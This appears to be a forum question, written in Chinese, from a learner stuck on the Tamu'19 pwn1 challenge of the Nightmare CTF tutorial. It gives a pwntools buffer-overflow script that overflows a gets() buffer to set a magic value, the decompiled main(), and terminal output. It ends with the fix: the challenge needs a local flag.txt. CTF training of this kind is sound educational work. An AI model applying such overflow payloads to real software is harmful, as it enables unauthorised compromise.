为了尽可能简洁,我正在运行一个 python 漏洞利用程序,它通过了它需要的所有检查,但是当原始 ELF 应该将标志写入 flag.txt 时,不会显示任何内容。我已经比较(甚至复制)了此挑战的其他解决方案,但没有一个真正为我显示标志。是我的空 flag.txt 文件的权限问题吗?
对于那些希望我详细说明这个问题的人: 我对我正在使用的整个系统架构、软件和技术都是陌生的,所以可能存在一个我不知道的简单问题。我目前正在经历穿着燕尾服的家伙的噩梦,并且我陷入了问题 Tamu'19_pwn1。 存储库:https://github.com/guyinatuxedo/nightmare/tree/master/modules/04-bof_variable/tamu19_pwn1
我在虚拟机上运行 Ubuntu 22.04 并使用 Python 3.10.12
我已经在 python3 中完成了脚本:
# Import pwntools
from pwn import *
# Set the target file
target = process('./pwn1')
# Our payload should overwrite the 43 bytes and input our desired value
payload = b"0"*0x2b + p32(0xdea110c8)
# Send the first two lines for the first two questions
print(target.recvline()) # recieve the Intro
print(target.recvline()) # recieve Q1
target.sendline("Sir Lancelot of Camelot")
print(target.recvline()) # Q2
target.sendline("To seek the Holy Grail.")
# Send out payload at the 3rd line
print(target.recvline()) #Q3
target.sendline(payload)
# Print the flags
print(target.recvline()) # Outro
print(target.recvline()) # flag
# I used .interactive() but that did not work either
#target.interactive()
我正在利用的文件位于 C 语言中。 这是文件中 main() 的片段:
/* WARNING: Function: __x86.get_pc_thunk.bx replaced with injection: get_pc_thunk_bx */
/* WARNING: Removing unreachable block (ram,0x000108bb) */
undefined4 main(void)
{
int strcmpResult0;
int strcmpResult1;
char input [43];
setvbuf(stdout,(char *)0x2,0,0);
puts(
"Stop! Who would cross the Bridge of Death must answer me these questions three, ere theother side he see."
);
puts("What... is your name?");
fgets(input,0x2b,stdin);
strcmpResult0 = strcmp(input,"Sir Lancelot of Camelot\n");
if (strcmpResult0 != 0) {
puts("I don\'t know that! Auuuuuuuugh!");
/* WARNING: Subroutine does not return */
exit(0);
}
puts("What... is your quest?");
fgets(input,0x2b,stdin);
strcmpResult1 = strcmp(input,"To seek the Holy Grail.\n");
if (strcmpResult1 == 0) {
puts("What... is my secret?");
gets(input);
puts("I don\'t know that! Auuuuuuuugh!");
return 0;
}
puts("I don\'t know that! Auuuuuuuugh!");
/* WARNING: Subroutine does not return */
exit(0);
}
我应该在 EOF 之前预料到这一点:
flag{g0ttem_boyz}相反,我得到了一条结束线,这就是我的 flag.txt 最初包含的内容。这是我运行漏洞利用程序时在终端中得到的结果:
$ python exploit.py
[+] Starting local process './pwn1': pid 12060
[*] Switching to interactive mode
[*] Process './pwn1' stopped with exit code 0 (pid 12060)
Stop! Who would cross the Bridge of Death must answer me these questions three, ere the other side he see.
What... is your name?
What... is your quest?
What... is my secret?
Right. Off you go.
[*] Got EOF while reading in interactive
$
不幸的是,要最好地了解该问题,您可能必须打开上面链接的存储库。
我发现问题是我个人对挑战本身的困惑。由于挑战过去是在持有该标志的服务器上运行的,所以现在它只会在计算机本地运行,模拟黑客攻击服务器的过程。因此我需要在本地目录中添加一个flag.txt。